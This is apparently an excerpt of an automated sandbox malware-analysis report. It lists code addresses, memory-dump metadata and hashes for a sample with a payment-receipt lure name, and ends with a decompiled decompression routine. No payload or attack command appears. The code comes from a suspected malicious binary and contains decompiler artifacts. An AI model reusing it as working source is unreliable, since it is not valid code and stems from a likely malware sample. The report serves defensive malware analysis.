                                                                                                                      0x004069e3
                                                                                                                      0x004069e3
                                                                                                                      0x004069e6
                                                                                                                      0x004069e7
                                                                                                                      0x004069e7
                                                                                                                      0x00000000
                                                                                                                      0x004069e3
                                                                                                                      0x004069bd
                                                                                                                      0x004069c2
                                                                                                                      0x004069c2
                                                                                                                      0x004069cb
                                                                                                                      0x004069d3
                                                                                                                      0x004069d6
                                                                                                                      0x00000000
                                                                                                                      0x004069dc
                                                                                                                      0x004069dc
                                                                                                                      0x00000000
                                                                                                                      0x004069dc
                                                                                                                      0x00000000
                                                                                                                      0x004069f9
                                                                                                                      0x004069f9
                                                                                                                      0x004069fd
                                                                                                                      0x004072a9
                                                                                                                      0x00000000
                                                                                                                      0x004072a9
                                                                                                                      0x00406a06
                                                                                                                      0x00406a16
                                                                                                                      0x00406a19
                                                                                                                      0x00406a1c
                                                                                                                      0x00406a1c
                                                                                                                      0x00406a1c
                                                                                                                      0x00406a1f
                                                                                                                      0x00406a23
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406a25
                                                                                                                      0x00406a2b
                                                                                                                      0x00406a55
                                                                                                                      0x00406a5b
                                                                                                                      0x00406a62
                                                                                                                      0x00000000
                                                                                                                      0x00406a62
                                                                                                                      0x00406a31
                                                                                                                      0x00406a34
                                                                                                                      0x00406a39
                                                                                                                      0x00406a39
                                                                                                                      0x00406a44
                                                                                                                      0x00406a4c
                                                                                                                      0x00406a4f
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406a94
                                                                                                                      0x00406a9a
                                                                                                                      0x00406a9d
                                                                                                                      0x00406aaa
                                                                                                                      0x00406ab2
                                                                                                                      0x00407126
                                                                                                                      0x00407126
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406a69
                                                                                                                      0x00406a69
                                                                                                                      0x00406a6d
                                                                                                                      0x004072b8
                                                                                                                      0x00000000
                                                                                                                      0x004072b8
                                                                                                                      0x00406a79
                                                                                                                      0x00406a84
                                                                                                                      0x00406a84
                                                                                                                      0x00406a84
                                                                                                                      0x00406a87
                                                                                                                      0x00406a8a
                                                                                                                      0x00406a8d
                                                                                                                      0x00406a92
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00407129
                                                                                                                      0x00407129
                                                                                                                      0x0040712f
                                                                                                                      0x00407135
                                                                                                                      0x0040713b
                                                                                                                      0x00407155
                                                                                                                      0x00407158
                                                                                                                      0x0040715e
                                                                                                                      0x00407169
                                                                                                                      0x0040716b
                                                                                                                      0x0040713d
                                                                                                                      0x0040713d
                                                                                                                      0x0040714c
                                                                                                                      0x00407150
                                                                                                                      0x00407150
                                                                                                                      0x00407175
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406aba
                                                                                                                      0x00406abc
                                                                                                                      0x00406abf
                                                                                                                      0x00406b30
                                                                                                                      0x00406b33
                                                                                                                      0x00406b36
                                                                                                                      0x00406b3d
                                                                                                                      0x00406b47
                                                                                                                      0x00407126
                                                                                                                      0x00407126
                                                                                                                      0x00407126
                                                                                                                      0x00000000
                                                                                                                      0x00407126
                                                                                                                      0x00407126
                                                                                                                      0x00406ac1
                                                                                                                      0x00406ac5
                                                                                                                      0x00406ac8
                                                                                                                      0x00406aca
                                                                                                                      0x00406acd
                                                                                                                      0x00406ad0
                                                                                                                      0x00406ad2
                                                                                                                      0x00406ad5
                                                                                                                      0x00406ad7
                                                                                                                      0x00406adc
                                                                                                                      0x00406adf
                                                                                                                      0x00406ae2
                                                                                                                      0x00406ae6
                                                                                                                      0x00406aed
                                                                                                                      0x00406af0
                                                                                                                      0x00406af7
                                                                                                                      0x00406afb
                                                                                                                      0x00406b03
                                                                                                                      0x00406b03
                                                                                                                      0x00406b03
                                                                                                                      0x00406afd
                                                                                                                      0x00406afd
                                                                                                                      0x00406afd
                                                                                                                      0x00406af2
                                                                                                                      0x00406af2
                                                                                                                      0x00406af2
                                                                                                                      0x00406b07
                                                                                                                      0x00406b0a
                                                                                                                      0x00406b28
                                                                                                                      0x00406b2a
                                                                                                                      0x00000000
                                                                                                                      0x00406b0c
                                                                                                                      0x00406b0c
                                                                                                                      0x00406b0f
                                                                                                                      0x00406b12
                                                                                                                      0x00406b15
                                                                                                                      0x00406b17
                                                                                                                      0x00406b17
                                                                                                                      0x00406b17
                                                                                                                      0x00406b1a
                                                                                                                      0x00406b1d
                                                                                                                      0x00406b1f
                                                                                                                      0x00406b20
                                                                                                                      0x00406b23
                                                                                                                      0x00000000
                                                                                                                      0x00406b23
                                                                                                                      0x00000000
                                                                                                                      0x00406d59
                                                                                                                      0x00406d5d
                                                                                                                      0x00406d7b
                                                                                                                      0x00406d7e
                                                                                                                      0x00406d85
                                                                                                                      0x00406d88
                                                                                                                      0x00406d8b
                                                                                                                      0x00406d8e
                                                                                                                      0x00406d91
                                                                                                                      0x00406d94
                                                                                                                      0x00406d96
                                                                                                                      0x00406d9d
                                                                                                                      0x00406d9e
                                                                                                                      0x00406da0
                                                                                                                      0x00406da3
                                                                                                                      0x00406da6
                                                                                                                      0x00406da9
                                                                                                                      0x00406da9
                                                                                                                      0x00406dae
                                                                                                                      0x00000000
                                                                                                                      0x00406dae
                                                                                                                      0x00406d5f
                                                                                                                      0x00406d62
                                                                                                                      0x00406d65
                                                                                                                      0x00406d6f
                                                                                                                      0x00407126
                                                                                                                      0x00407126
                                                                                                                      0x00407126
                                                                                                                      0x00000000
                                                                                                                      0x00407126
                                                                                                                      0x00000000
                                                                                                                      0x00406dc3
                                                                                                                      0x00406dc7
                                                                                                                      0x00406dea
                                                                                                                      0x00406ded
                                                                                                                      0x00406df0
                                                                                                                      0x00406dfa
                                                                                                                      0x00406dc9
                                                                                                                      0x00406dc9
                                                                                                                      0x00406dcc
                                                                                                                      0x00406dcf
                                                                                                                      0x00406dd2
                                                                                                                      0x00406ddf
                                                                                                                      0x00406de2
                                                                                                                      0x00406de2
                                                                                                                      0x00407126
                                                                                                                      0x00407126
                                                                                                                      0x00407126
                                                                                                                      0x00000000
                                                                                                                      0x00407126
                                                                                                                      0x00000000
                                                                                                                      0x00406e06
                                                                                                                      0x00406e0a
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406e10
                                                                                                                      0x00406e14
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406e1a
                                                                                                                      0x00406e1c
                                                                                                                      0x00406e20
                                                                                                                      0x00406e20
                                                                                                                      0x00406e23
                                                                                                                      0x00406e27
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406e9e
                                                                                                                      0x00406ea2
                                                                                                                      0x00406ea9
                                                                                                                      0x00406eac
                                                                                                                      0x00406eaf
                                                                                                                      0x00406ea4
                                                                                                                      0x00406ea4
                                                                                                                      0x00406ea4
                                                                                                                      0x00406eb2
                                                                                                                      0x00406eb5
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406f5e
                                                                                                                      0x00406f5e
                                                                                                                      0x00406f62
                                                                                                                      0x00407300
                                                                                                                      0x00000000
                                                                                                                      0x00407300
                                                                                                                      0x00406f68
                                                                                                                      0x00406f6b
                                                                                                                      0x00406f6e
                                                                                                                      0x00406f72
                                                                                                                      0x00406f75
                                                                                                                      0x00406f7b
                                                                                                                      0x00406f7d
                                                                                                                      0x00406f7d
                                                                                                                      0x00406f7d
                                                                                                                      0x00406f80
                                                                                                                      0x00406f83
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406b53
                                                                                                                      0x00406b53
                                                                                                                      0x00406b57
                                                                                                                      0x004072c4
                                                                                                                      0x00000000
                                                                                                                      0x004072c4
                                                                                                                      0x00406b5d
                                                                                                                      0x00406b60
                                                                                                                      0x00406b63
                                                                                                                      0x00406b67
                                                                                                                      0x00406b6a
                                                                                                                      0x00406b70
                                                                                                                      0x00406b72
                                                                                                                      0x00406b72
                                                                                                                      0x00406b72
                                                                                                                      0x00406b75
                                                                                                                      0x00406b78
                                                                                                                      0x00406b78
                                                                                                                      0x00406b7b
                                                                                                                      0x00406b7e
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406b84
                                                                                                                      0x00406b8a
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406b90
                                                                                                                      0x00406b90
                                                                                                                      0x00406b94
                                                                                                                      0x00406b97
                                                                                                                      0x00406b9a
                                                                                                                      0x00406b9d
                                                                                                                      0x00406ba0
                                                                                                                      0x00406ba1
                                                                                                                      0x00406ba4
                                                                                                                      0x00406ba6
                                                                                                                      0x00406bac
                                                                                                                      0x00406baf
                                                                                                                      0x00406bb2
                                                                                                                      0x00406bb5
                                                                                                                      0x00406bb8
                                                                                                                      0x00406bbb
                                                                                                                      0x00406bbe
                                                                                                                      0x00406bda
                                                                                                                      0x00406bdd
                                                                                                                      0x00406be0
                                                                                                                      0x00406be3
                                                                                                                      0x00406bea
                                                                                                                      0x00406bee
                                                                                                                      0x00406bf0
                                                                                                                      0x00406bf4
                                                                                                                      0x00406bc0
                                                                                                                      0x00406bc0
                                                                                                                      0x00406bc4
                                                                                                                      0x00406bcc
                                                                                                                      0x00406bd1
                                                                                                                      0x00406bd3
                                                                                                                      0x00406bd5
                                                                                                                      0x00406bd5
                                                                                                                      0x00406bf7
                                                                                                                      0x00406bfe
                                                                                                                      0x00406c01
                                                                                                                      0x00000000
                                                                                                                      0x00406c07
                                                                                                                      0x00000000
                                                                                                                      0x00406c07
                                                                                                                      0x00000000
                                                                                                                      0x00406c0c
                                                                                                                      0x00406c0c
                                                                                                                      0x00406c10
                                                                                                                      0x004072d0
                                                                                                                      0x00000000
                                                                                                                      0x004072d0
                                                                                                                      0x00406c16
                                                                                                                      0x00406c19
                                                                                                                      0x00406c1c
                                                                                                                      0x00406c20
                                                                                                                      0x00406c23
                                                                                                                      0x00406c29
                                                                                                                      0x00406c2b
                                                                                                                      0x00406c2b
                                                                                                                      0x00406c2b
                                                                                                                      0x00406c2e
                                                                                                                      0x00406c31
                                                                                                                      0x00406c31
                                                                                                                      0x00406c31
                                                                                                                      0x00406c37
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406c39
                                                                                                                      0x00406c3c
                                                                                                                      0x00406c3f
                                                                                                                      0x00406c42
                                                                                                                      0x00406c45
                                                                                                                      0x00406c48
                                                                                                                      0x00406c4b
                                                                                                                      0x00406c4e
                                                                                                                      0x00406c51
                                                                                                                      0x00406c54
                                                                                                                      0x00406c57
                                                                                                                      0x00406c6f
                                                                                                                      0x00406c72
                                                                                                                      0x00406c75
                                                                                                                      0x00406c78
                                                                                                                      0x00406c7b
                                                                                                                      0x00406c7f
                                                                                                                      0x00406c81
                                                                                                                      0x00406c59
                                                                                                                      0x00406c59
                                                                                                                      0x00406c61
                                                                                                                      0x00406c66
                                                                                                                      0x00406c68
                                                                                                                      0x00406c6a
                                                                                                                      0x00406c6a
                                                                                                                      0x00406c84
                                                                                                                      0x00406c8b
                                                                                                                      0x00406c8e
                                                                                                                      0x00000000
                                                                                                                      0x00406c90
                                                                                                                      0x00000000
                                                                                                                      0x00406c90
                                                                                                                      0x00406c8e
                                                                                                                      0x00406c95
                                                                                                                      0x00406c95
                                                                                                                      0x00406c95
                                                                                                                      0x00406c95
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406cd0
                                                                                                                      0x00406cd0
                                                                                                                      0x00406cd4
                                                                                                                      0x004072dc
                                                                                                                      0x00000000
                                                                                                                      0x004072dc
                                                                                                                      0x00406cda
                                                                                                                      0x00406cdd
                                                                                                                      0x00406ce0
                                                                                                                      0x00406ce4
                                                                                                                      0x00406ce7
                                                                                                                      0x00406ced
                                                                                                                      0x00406cef
                                                                                                                      0x00406cef
                                                                                                                      0x00406cef
                                                                                                                      0x00406cf2
                                                                                                                      0x00406cf5
                                                                                                                      0x00406cf5
                                                                                                                      0x00406cfb
                                                                                                                      0x00406c99
                                                                                                                      0x00406c99
                                                                                                                      0x00406c9c
                                                                                                                      0x00000000
                                                                                                                      0x00406c9c
                                                                                                                      0x00406cfd
                                                                                                                      0x00406cfd
                                                                                                                      0x00406d00
                                                                                                                      0x00406d03
                                                                                                                      0x00406d06
                                                                                                                      0x00406d09
                                                                                                                      0x00406d0c
                                                                                                                      0x00406d0f
                                                                                                                      0x00406d12
                                                                                                                      0x00406d15
                                                                                                                      0x00406d18
                                                                                                                      0x00406d1b
                                                                                                                      0x00406d33
                                                                                                                      0x00406d36
                                                                                                                      0x00406d39
                                                                                                                      0x00406d3c
                                                                                                                      0x00406d3f
                                                                                                                      0x00406d43
                                                                                                                      0x00406d45
                                                                                                                      0x00406d1d
                                                                                                                      0x00406d1d
                                                                                                                      0x00406d25
                                                                                                                      0x00406d2a
                                                                                                                      0x00406d2c
                                                                                                                      0x00406d2e
                                                                                                                      0x00406d2e
                                                                                                                      0x00406d48
                                                                                                                      0x00406d4f
                                                                                                                      0x00406d52
                                                                                                                      0x00000000
                                                                                                                      0x00406d54
                                                                                                                      0x00000000
                                                                                                                      0x00406d54
                                                                                                                      0x00000000
                                                                                                                      0x00406fe1
                                                                                                                      0x00406fe1
                                                                                                                      0x00406fe5
                                                                                                                      0x0040730c
                                                                                                                      0x00000000
                                                                                                                      0x0040730c
                                                                                                                      0x00406feb
                                                                                                                      0x00406fee
                                                                                                                      0x00406ff1
                                                                                                                      0x00406ff5
                                                                                                                      0x00406ff8
                                                                                                                      0x00406ffe
                                                                                                                      0x00407000
                                                                                                                      0x00407000
                                                                                                                      0x00407000
                                                                                                                      0x00407003
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004070f0
                                                                                                                      0x004070f4
                                                                                                                      0x00407116
                                                                                                                      0x00407119
                                                                                                                      0x00407123
                                                                                                                      0x00407126
                                                                                                                      0x00407126
                                                                                                                      0x00407126
                                                                                                                      0x00000000
                                                                                                                      0x00407126
                                                                                                                      0x00407126
                                                                                                                      0x004070f6
                                                                                                                      0x004070f9
                                                                                                                      0x004070fd
                                                                                                                      0x00407100
                                                                                                                      0x00407100
                                                                                                                      0x00407103
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004071ad
                                                                                                                      0x004071b1
                                                                                                                      0x004071cf
                                                                                                                      0x004071cf
                                                                                                                      0x004071cf
                                                                                                                      0x004071d6
                                                                                                                      0x004071dd
                                                                                                                      0x004071e4
                                                                                                                      0x004071e4
                                                                                                                      0x00000000
                                                                                                                      0x004071e4
                                                                                                                      0x004071b3
                                                                                                                      0x004071b6
                                                                                                                      0x004071b9
                                                                                                                      0x004071bc
                                                                                                                      0x004071c3
                                                                                                                      0x00407107
                                                                                                                      0x00407107
                                                                                                                      0x0040710a
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0040729e
                                                                                                                      0x004072a1
                                                                                                                      0x004071a2
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406ed8
                                                                                                                      0x00406eda
                                                                                                                      0x00406ee1
                                                                                                                      0x00406ee2
                                                                                                                      0x00406ee4
                                                                                                                      0x00406ee7
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406eef
                                                                                                                      0x00406ef2
                                                                                                                      0x00406ef5
                                                                                                                      0x00406ef7
                                                                                                                      0x00406ef9
                                                                                                                      0x00406ef9
                                                                                                                      0x00406efa
                                                                                                                      0x00406efd
                                                                                                                      0x00406f04
                                                                                                                      0x00406f07
                                                                                                                      0x00406f15
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004071eb
                                                                                                                      0x004071eb
                                                                                                                      0x004071ee
                                                                                                                      0x004071f5
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004071fa
                                                                                                                      0x004071fa
                                                                                                                      0x004071fe
                                                                                                                      0x00407336
                                                                                                                      0x00000000
                                                                                                                      0x00407336
                                                                                                                      0x00407204
                                                                                                                      0x00407207
                                                                                                                      0x0040720a
                                                                                                                      0x0040720e
                                                                                                                      0x00407211
                                                                                                                      0x00407217
                                                                                                                      0x00407219
                                                                                                                      0x00407219
                                                                                                                      0x00407219
                                                                                                                      0x0040721c
                                                                                                                      0x0040721f
                                                                                                                      0x0040721f
                                                                                                                      0x0040721f
                                                                                                                      0x0040721f
                                                                                                                      0x00407222
                                                                                                                      0x00407222
                                                                                                                      0x00407226
                                                                                                                      0x00407286
                                                                                                                      0x00407289
                                                                                                                      0x0040728e
                                                                                                                      0x0040728f
                                                                                                                      0x00407291
                                                                                                                      0x00407293
                                                                                                                      0x00407296
                                                                                                                      0x004071a2
                                                                                                                      0x004071a2
                                                                                                                      0x00000000
                                                                                                                      0x004071a8
                                                                                                                      0x004071a2
                                                                                                                      0x00407228
                                                                                                                      0x0040722e
                                                                                                                      0x00407231
                                                                                                                      0x00407234
                                                                                                                      0x00407237
                                                                                                                      0x0040723a
                                                                                                                      0x0040723d
                                                                                                                      0x00407240
                                                                                                                      0x00407243
                                                                                                                      0x00407246
                                                                                                                      0x00407249
                                                                                                                      0x00407262
                                                                                                                      0x00407265
                                                                                                                      0x00407268
                                                                                                                      0x0040726b
                                                                                                                      0x0040726f
                                                                                                                      0x00407271
                                                                                                                      0x00407271
                                                                                                                      0x00407272
                                                                                                                      0x00407275
                                                                                                                      0x0040724b
                                                                                                                      0x0040724b
                                                                                                                      0x00407253
                                                                                                                      0x00407258
                                                                                                                      0x0040725a
                                                                                                                      0x0040725d
                                                                                                                      0x0040725d
                                                                                                                      0x00407278
                                                                                                                      0x0040727f
                                                                                                                      0x00000000
                                                                                                                      0x00407281
                                                                                                                      0x00000000
                                                                                                                      0x00407281
                                                                                                                      0x00000000
                                                                                                                      0x00406f1d
                                                                                                                      0x00406f20
                                                                                                                      0x00406f56
                                                                                                                      0x00407086
                                                                                                                      0x00407086
                                                                                                                      0x00407086
                                                                                                                      0x00407086
                                                                                                                      0x00407089
                                                                                                                      0x00407089
                                                                                                                      0x0040708c
                                                                                                                      0x0040708e
                                                                                                                      0x00407318
                                                                                                                      0x00000000
                                                                                                                      0x00407318
                                                                                                                      0x00407094
                                                                                                                      0x00407097
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0040709d
                                                                                                                      0x004070a1
                                                                                                                      0x004070a4
                                                                                                                      0x004070a4
                                                                                                                      0x004070a4
                                                                                                                      0x00000000
                                                                                                                      0x004070a4
                                                                                                                      0x00406f22
                                                                                                                      0x00406f24
                                                                                                                      0x00406f26
                                                                                                                      0x00406f28
                                                                                                                      0x00406f2b
                                                                                                                      0x00406f2c
                                                                                                                      0x00406f2e
                                                                                                                      0x00406f30
                                                                                                                      0x00406f33
                                                                                                                      0x00406f36
                                                                                                                      0x00406f4c
                                                                                                                      0x00406f51
                                                                                                                      0x00406f89
                                                                                                                      0x00406f89
                                                                                                                      0x00406f8d
                                                                                                                      0x00406fb9
                                                                                                                      0x00406fbb
                                                                                                                      0x00406fc2
                                                                                                                      0x00406fc5
                                                                                                                      0x00406fc8
                                                                                                                      0x00406fc8
                                                                                                                      0x00406fcd
                                                                                                                      0x00406fcd
                                                                                                                      0x00406fcf
                                                                                                                      0x00406fd2
                                                                                                                      0x00406fd9
                                                                                                                      0x00406fdc
                                                                                                                      0x00407009
                                                                                                                      0x00407009
                                                                                                                      0x0040700c
                                                                                                                      0x0040700f
                                                                                                                      0x00407083
                                                                                                                      0x00407083
                                                                                                                      0x00407083
                                                                                                                      0x00000000
                                                                                                                      0x00407083
                                                                                                                      0x00407011
                                                                                                                      0x00407017
                                                                                                                      0x0040701a
                                                                                                                      0x0040701d
                                                                                                                      0x00407020
                                                                                                                      0x00407023
                                                                                                                      0x00407026
                                                                                                                      0x00407029
                                                                                                                      0x0040702c
                                                                                                                      0x0040702f
                                                                                                                      0x00407032
                                                                                                                      0x0040704b
                                                                                                                      0x0040704d
                                                                                                                      0x00407050
                                                                                                                      0x00407051
                                                                                                                      0x00407054
                                                                                                                      0x00407056
                                                                                                                      0x00407059
                                                                                                                      0x0040705b
                                                                                                                      0x0040705d
                                                                                                                      0x00407060
                                                                                                                      0x00407062
                                                                                                                      0x00407065
                                                                                                                      0x00407069
                                                                                                                      0x0040706b
                                                                                                                      0x0040706b
                                                                                                                      0x0040706c
                                                                                                                      0x0040706f
                                                                                                                      0x00407072
                                                                                                                      0x00407034
                                                                                                                      0x00407034
                                                                                                                      0x0040703c
                                                                                                                      0x00407041
                                                                                                                      0x00407043
                                                                                                                      0x00407046
                                                                                                                      0x00407046
                                                                                                                      0x00407075
                                                                                                                      0x0040707c
                                                                                                                      0x00407006
                                                                                                                      0x00407006
                                                                                                                      0x00407006
                                                                                                                      0x00407006
                                                                                                                      0x00000000
                                                                                                                      0x0040707e
                                                                                                                      0x00000000
                                                                                                                      0x0040707e
                                                                                                                      0x0040707c
                                                                                                                      0x00406f8f
                                                                                                                      0x00406f92
                                                                                                                      0x00406f94
                                                                                                                      0x00406f97
                                                                                                                      0x00406f9a
                                                                                                                      0x00406f9d
                                                                                                                      0x00406f9f
                                                                                                                      0x00406fa2
                                                                                                                      0x00406fa5
                                                                                                                      0x00406fa5
                                                                                                                      0x00406fa8
                                                                                                                      0x00406fa8
                                                                                                                      0x00406fab
                                                                                                                      0x00406fb2
                                                                                                                      0x00406f86
                                                                                                                      0x00406f86
                                                                                                                      0x00406f86
                                                                                                                      0x00406f86
                                                                                                                      0x00000000
                                                                                                                      0x00406fb4
                                                                                                                      0x00000000
                                                                                                                      0x00406fb4
                                                                                                                      0x00406fb2
                                                                                                                      0x00406f38
                                                                                                                      0x00406f3b
                                                                                                                      0x00406f3d
                                                                                                                      0x00406f40
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406c9f
                                                                                                                      0x00406c9f
                                                                                                                      0x00406ca3
                                                                                                                      0x004072e8
                                                                                                                      0x00000000
                                                                                                                      0x004072e8
                                                                                                                      0x00406ca9
                                                                                                                      0x00406cac
                                                                                                                      0x00406caf
                                                                                                                      0x00406cb2
                                                                                                                      0x00406cb5
                                                                                                                      0x00406cb8
                                                                                                                      0x00406cbb
                                                                                                                      0x00406cbd
                                                                                                                      0x00406cc0
                                                                                                                      0x00406cc3
                                                                                                                      0x00406cc6
                                                                                                                      0x00406cc8
                                                                                                                      0x00406cc8
                                                                                                                      0x00406cc8
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406e2a
                                                                                                                      0x00406e2a
                                                                                                                      0x00406e2e
                                                                                                                      0x004072f4
                                                                                                                      0x00000000
                                                                                                                      0x004072f4
                                                                                                                      0x00406e34
                                                                                                                      0x00406e37
                                                                                                                      0x00406e3a
                                                                                                                      0x00406e3d
                                                                                                                      0x00406e3f
                                                                                                                      0x00406e3f
                                                                                                                      0x00406e3f
                                                                                                                      0x00406e42
                                                                                                                      0x00406e45
                                                                                                                      0x00406e48
                                                                                                                      0x00406e4b
                                                                                                                      0x00406e4e
                                                                                                                      0x00406e51
                                                                                                                      0x00406e52
                                                                                                                      0x00406e54
                                                                                                                      0x00406e54
                                                                                                                      0x00406e54
                                                                                                                      0x00406e57
                                                                                                                      0x00406e5a
                                                                                                                      0x00406e5d
                                                                                                                      0x00406e60
                                                                                                                      0x00406e60
                                                                                                                      0x00406e60
                                                                                                                      0x00406e63
                                                                                                                      0x00406e65
                                                                                                                      0x00406e65
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004070a7
                                                                                                                      0x004070a7
                                                                                                                      0x004070a7
                                                                                                                      0x004070ab
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004070b1
                                                                                                                      0x004070b4
                                                                                                                      0x004070b7
                                                                                                                      0x004070ba
                                                                                                                      0x004070bc
                                                                                                                      0x004070bc
                                                                                                                      0x004070bc
                                                                                                                      0x004070bf
                                                                                                                      0x004070c2
                                                                                                                      0x004070c5
                                                                                                                      0x004070c8
                                                                                                                      0x004070cb
                                                                                                                      0x004070ce
                                                                                                                      0x004070cf
                                                                                                                      0x004070d1
                                                                                                                      0x004070d1
                                                                                                                      0x004070d1
                                                                                                                      0x004070d4
                                                                                                                      0x004070d7
                                                                                                                      0x004070da
                                                                                                                      0x004070dd
                                                                                                                      0x004070e0
                                                                                                                      0x004070e4
                                                                                                                      0x004070e6
                                                                                                                      0x004070e9
                                                                                                                      0x00000000
                                                                                                                      0x004070eb
                                                                                                                      0x00406e68
                                                                                                                      0x00406e68
                                                                                                                      0x00000000
                                                                                                                      0x00406e68
                                                                                                                      0x004070e9
                                                                                                                      0x0040731e
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0040694d
                                                                                                                      0x00407355
                                                                                                                      0x00407355
                                                                                                                      0x00000000
                                                                                                                      0x00407355
                                                                                                                      0x004071a2
                                                                                                                      0x00407129
                                                                                                                      0x00407126
                                                                                                                      0x00000000
                                                                                                                      0x00406e7b

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c52b64c4cba7ecf1fb5e1bb59396999cb3f4df188a1ab73f316032be63138ba7
                                                                                                                      • Instruction ID: 968097f9e37e498ed83c4652799cdf8e1ebeb5c7fee57b8dc09d96684c556b9e
                                                                                                                      • Opcode Fuzzy Hash: c52b64c4cba7ecf1fb5e1bb59396999cb3f4df188a1ab73f316032be63138ba7
                                                                                                                      • Instruction Fuzzy Hash: 27712471E04228CFDF28CFA8C854BADBBB1FB44305F15806AD856BB281C7786996DF45
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 98%
                                                                                                                      			E00406DC3() {
                                                                                                                      				unsigned short _t531;
                                                                                                                      				signed int _t532;
                                                                                                                      				void _t533;
                                                                                                                      				signed int _t534;
                                                                                                                      				signed int _t535;
                                                                                                                      				signed int _t565;
                                                                                                                      				signed int _t568;
                                                                                                                      				signed int _t589;
                                                                                                                      				signed int* _t606;
                                                                                                                      				void* _t613;
                                                                                                                      
                                                                                                                      				L0:
                                                                                                                      				while(1) {
                                                                                                                      					L0:
                                                                                                                      					if( *(_t613 - 0x40) != 0) {
                                                                                                                      						 *(_t613 - 0x84) = 0xa;
                                                                                                                      						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                                                                                                      					} else {
                                                                                                                      						 *(__ebp - 0x84) = 9;
                                                                                                                      						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                      					}
                                                                                                                      					while(1) {
                                                                                                                      						 *(_t613 - 0x54) = _t606;
                                                                                                                      						while(1) {
                                                                                                                      							L133:
                                                                                                                      							_t531 =  *_t606;
                                                                                                                      							_t589 = _t531 & 0x0000ffff;
                                                                                                                      							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                      							if( *(_t613 - 0xc) >= _t565) {
                                                                                                                      								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                      								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                      								 *(_t613 - 0x40) = 1;
                                                                                                                      								_t532 = _t531 - (_t531 >> 5);
                                                                                                                      								 *_t606 = _t532;
                                                                                                                      							} else {
                                                                                                                      								 *(_t613 - 0x10) = _t565;
                                                                                                                      								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                      								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                      							}
